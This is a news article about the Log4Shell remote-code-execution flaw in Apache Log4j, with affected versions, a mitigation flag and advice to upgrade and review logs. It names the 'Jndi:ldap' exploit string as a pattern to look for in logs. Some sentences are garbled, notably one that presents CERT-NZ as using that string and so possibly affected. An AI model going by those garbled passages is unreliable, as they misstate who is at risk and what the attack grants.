New reports reveal a new zero-day vulnerability within the Java logging library Apache Log4j, tracked as CVE-2021-44228, that threat actors could find easy to exploit since it allows them to gain control over impacted servers.
The discovered Java logging library vulnerability is classified as severe since it allows unauthorised remote code execution to be the administrator that runs the application that uses the Java logging library. Several security experts have warned that this vulnerability exploitation is already happening in cyberspace. They also advised administrators and users to implement the recommended mitigations quickly to avoid further issues regarding the vulnerability.
The affected systems and services in the vulnerability include those that use the Java logging library Apache Log4j in versions 2.0 to 2.14.1. Several applications and servers written in Java are also impacted.
It was also found that many cloud applications such as Apple iCloud and Steam are affected by the new vulnerability, along with the application Minecraft that is said to have patched their servers already.
Threat actors also exploit the vulnerability in enterprise applications; therefore, experts may find other products prone to attacks as they learn more about the vulnerability. Another security expert revealed that people who use the Apache Struts might also be vulnerable to attacks.
The security firm who found the Java logging library vulnerability explained that its impact is severe because of how widespread it is among users and how easily it can be exploited. They also dubbed the vulnerability ‘Log4Shell’.
The firms affected by the vulnerability are advised to identify the threat within their servers by examining the log files for any applications that use the Log4j versions. For example, CERT-NZ uses the ‘Jndi:ldap’ user-controlled strings; hence, they could be one of the affected firms with the vulnerability.
In terms of mitigating the vulnerability after discovering it within a system, admins must switch the log4j2.formatMsgNoLookups to true by placing “‐Dlog4j2.formatMsgNoLookups=True” within the JVM command line.
However, it is more important to prevent the risk of being attacked than mitigate it upon happening. That is why experts recommended upgrading the Log4j versions quickly to log4j-2.15.0-rc1.
Firms who believe that the Java logging library vulnerability might impact them must exercise a breach mentality and immediately review all log files for unusual or malicious activities in their servers. And if there are unexpected activities found, it is highly encouraged that firms should assume it to be an active incident and respond with proper security measures accordingly.
